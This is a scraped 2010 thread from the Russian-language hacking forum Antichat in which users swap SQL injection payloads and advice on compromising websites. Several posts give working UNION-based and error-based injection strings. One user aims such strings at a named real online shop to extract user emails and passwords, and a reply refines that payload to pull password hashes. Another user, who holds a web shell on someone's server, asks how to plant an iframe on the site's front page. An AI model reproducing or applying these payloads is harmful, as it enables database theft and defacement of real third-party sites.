ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.08.2010, 23:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
9796
Репутация:
0
|
|
Подскажите как на шелле с ограниченными правами можно вставить iframe ?
|
|
|
|
05.08.2010, 00:12
|
|
Новичок
Регистрация: 01.07.2009
Сообщений: 9
Провел на форуме:
96770
Репутация:
1
|
|
Сообщение от _iks_
_iks_ said:
Вот пример, читай то что пониже /thread119047.html
Потом гугли другие способы, если этот не прокатит.
я читал эту и другие статьи по инъекциям несколько раз. если бы я знал ответ, то не спрашивал. ты можешь предложить что-то конкретное? гуглить не подходит
|
|
|
05.08.2010, 01:44
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от tompson_
tompson_ said:
может сразу рутшелл дать? я конкретно сформулировал вопрос. те, кто знают, ответят
Сообщение от tompson_
tompson_ said:
я читал эту и другие статьи по инъекциям несколько раз. если бы я знал ответ, то не спрашивал. ты можешь предложить что-то конкретное?
гуглить
не подходит
Не груби, тут тебе никто ничем не обязан.
Как я понял, проблема в том, что параметр id обрамлен кавычками и тебе не составить верный запрос.
Крути так:
Код HTML:
HTML:
-99999'+union+select+1,2,3+and+'1'='1
Код HTML:
HTML:
-99999'+union+select+1,version(),3+and+'1'='1
Код HTML:
HTML:
-999999'+union+select+1,((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1)),3+and+'1'='1
И так далее
Либо отсеки ненужное комментарием -- -
Код HTML:
HTML:
-999999'+union+select+1,((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1)),3-- -
UPDATE:
Вот тебе через ошибку
Код HTML:
HTML:
-9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)+and+'1'='1
и аналогично с -- -
Код HTML:
HTML:
-9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)-- -
|
|
|
|
05.08.2010, 02:21
|
|
Новичок
Регистрация: 01.07.2009
Сообщений: 9
Провел на форуме:
96770
Репутация:
1
|
|
Redwood,
я в курсе, что мне тут никто ничем не обязан и я не грублю. сам посуди, ответы
Сообщение от -PRIVAT-
-PRIVAT- said:
Линк на скулю дай.
или
Сообщение от _iks_
_iks_ said:
Потом гугли другие способы, если этот не прокатит.
можно было просто не писать.
по твоему ответу,
Сообщение от Redwood
Redwood said:
Крути так:
я написал, что в скрипте следующий запрос - UPDATE, который выплевывает ошибку.
а за
Код HTML:
HTML:
-9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)+and+'1'='1
спасибо
|
|
|
|
05.08.2010, 08:48
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от M.MIB
M.MIB said:
Подскажите как на шелле с ограниченными правами можно вставить iframe ?
все зависит от шелла, инклюды, через базу и тд и тп
|
|
|
|
05.08.2010, 08:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
2597
Репутация:
0
|
|
http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=produ cts&Categories=&perpagenum=32&id=434%20or%20(1,23) =(select+1+from+(select+count(0),concat((select+co ncat(ID,Email)+from+userinfo+limit+0,1),floor(rand (0)*2))+from+information_schema.tables+group+by+2) a)--
-->
Duplicate entry '1800qqguy85@yahoo.com1' for key 1
but this is not working!
http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=produ cts&Categories=&perpagenum=32&id=434 or (1,23)=(select+1+from+(select+count(0),concat((sel ect+concat(Password)+from+userinfo+limit+0,1),floo r(rand(0)*2))+from+information_schema.tables+group +by+2)a)--
|
|
|
|
05.08.2010, 10:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
9796
Репутация:
0
|
|
Сообщение от Gorev
Gorev said:
все зависит от шелла, инклюды, через базу и тд и тп
Можеш объяснить подробнее или дать линк на какой нить ман, шелл wso, safe mode off, нехватает прав править морду.
|
|
|
|
05.08.2010, 11:31
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от M.MIB
M.MIB said:
Можеш объяснить подробнее или дать линк на какой нить ман, шелл wso, safe mode off, нехватает прав править морду.
да мануала как такогог нет, есть выдумка и способы обхода хитростей админа..стандартного нет ничего..все по разномy
|
|
|
|
05.08.2010, 13:30
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
Сообщение от happygirl
happygirl said:
but this is not working!
You can use substring function to solve this problem
Код:
Code:
http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=products&Categories=&perpagenum=32&id=434 or (1,23)=(select+1+from+(select+count( 0),concat((select+concat(ID,0x3a,substring(password,1,32))+from+userinfo+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--
|
|
|
|
05.08.2010, 22:45
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235
Репутация:
39
|
|
Сообщение от kfor
kfor said:
Это не коментарии, а один из способов разделения запроса. Скорее всего там стоит прег реплейс который заменяет ненужные символы.
там берется path из url-а, в котором браузер заменяет пробелы на %20, соответственно эти %20 попадают в запрос. Пробовал передать вручную Path без пробелом - нгинкс возвращает ошибку bad request. так что видимо не получится ничего сделать как оказалось, сайт делала одна "студия", которая уже сделала довольно много сайтов (в портфолио около 100), и на всех то самое... обидно)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
